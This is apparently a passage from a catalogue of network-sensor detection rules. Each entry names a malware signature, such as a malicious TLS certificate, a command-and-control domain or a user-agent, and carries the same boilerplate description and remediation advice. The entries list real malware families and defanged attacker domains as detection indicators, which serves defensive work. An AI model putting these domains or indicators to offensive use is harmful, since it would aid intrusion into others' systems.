This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (TinyNuke Variant CnC) 2020-02-09

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Turla/APT34 CnC Domain)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Turla CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Unattributed CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Unattributed CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Unattributed CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Upatre CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Ursnif CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Ursnif CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Ursnif CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Ursnif CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Ursnif CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Ursnif CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Ursnif Inject Domain)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Ursnif Injects)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Various CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Various CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Various CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (W32/TrojanDownloader.Agent.FBF Variant CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (WastedLoader CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (WastedLoader CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Win32/Gadwats Banker CnC Domain)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Win32/Gadwats Banker CnC Domain)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Win32/SandCat CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Win32/Unk Downloader CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Zepakab CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Zeromax Stealer CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Zloader CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL/TLS Certificate (IcedID CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Malicious SSL/TLS Certificate (IcedID CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Malicious SSL/TLS Certificate (Jasper CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Malicious SSL/TLS Certificate (Jasper CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Malicious UA (Skuxray)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Malsmoke Staging Domain in SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Malware Delivery Domain (analyticsnet .top in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Malware Delivery Landing Page Domain (bigeront .top in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed MassLogger Domain in TLS SNI (ecigroup-tw .com)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed MAZE Ransomware CnC Domain (checksoffice .me in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Observed MAZE Ransomware CnC Domain (plaintsotherest .net in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Observed MAZE Ransomware CnC Domain (thesawmeinrew .net in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Observed MongoLock Variant CnC Domain (s .rapid7 .xyz in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed MSIL/Heracles Variant CnC Domain (stainless .fun in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed MSIL/n2019cov (COVID-19) Ransomware CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Observed Nemty Ransomware Payment Page

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Observed OSX/GMERA.A CnC Domain (appstockfolio .com in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed OSX/NukeSped Variant CnC Domain (fudcitydelivers .com) in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed OSX/NukeSped Variant CnC Domain (sctemarkets .com) in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed OSX/Silver Sparrow Download Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed OSX/Silver Sparrow Download Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed OSX/WizardUpdate Domain in TLS SNI ( .dlvplayer .com)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Pegasus Domain (api1r3f4 .redirectweburl .com in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Pegasus Domain (hooklevel .com in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed PHPs Labyrinth Stage2 CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed PHPs Labyrinth Stage2 CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed PHPs Labyrinth Stage2 CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed PHPs Labyrinth Stage2 CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed PHPs Labyrinth Stage2 CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed PHPs Labyrinth Stage2 CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed PHPs Labyrinth Stage2 CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed PHPs Labyrinth Stage2 CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed PHPs Labyrinth Stage2 CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed PHPs Labyrinth Stage2 CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed PHPs Labyrinth Stage2 CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed PHPs Labyrinth Stage2 CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed PoetRAT Domain (dellgenius .hoptop .org in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed PoetRAT Domain (slimip .accesscam .org in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Possible PowerSploit/PowerView .ps1 Inbound

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed ProtonBot User-Agent

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Puzzlemaker Remote Shell Domain (media-seoengine .com in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Qbot Style SSL Certificate

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Reimageplus Ransomware Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Observed Sidewinder APT User-Agent

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Silver Implant Domain (raspoly .biz in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed SluttyPutty Maldoc User-Agent

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed SSL/TLS Cert (Splashtop Remote Support)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed SSV Agent CnC Domain (be-government .com in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed SSV Agent CnC Domain (drmtake .tk in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed SSV Agent CnC Domain (edgecloudc .com in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed SSV Agent CnC Domain (flushcdn .com in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed SSV Agent CnC Domain (gitcloudcache .com in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed SSV Agent CnC Domain (hostupoeui .com in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed SSV Agent CnC Domain (rsnet-devel .com in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed StrongPity CnC Domain (applicationrepo .com in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed StrongPity CnC Domain (hardwareoption .com in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed StrongPity CnC Domain (hierarchicalfiles .com in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed StrongPity CnC Domain (hostoperationsystems .com in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed StrongPity CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed StrongPity CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed StrongPity CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed StrongPity CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed StrongPity CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed StrongPity CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed StrongPity CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed StrongPity CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed StrongPity CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed StrongPity CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

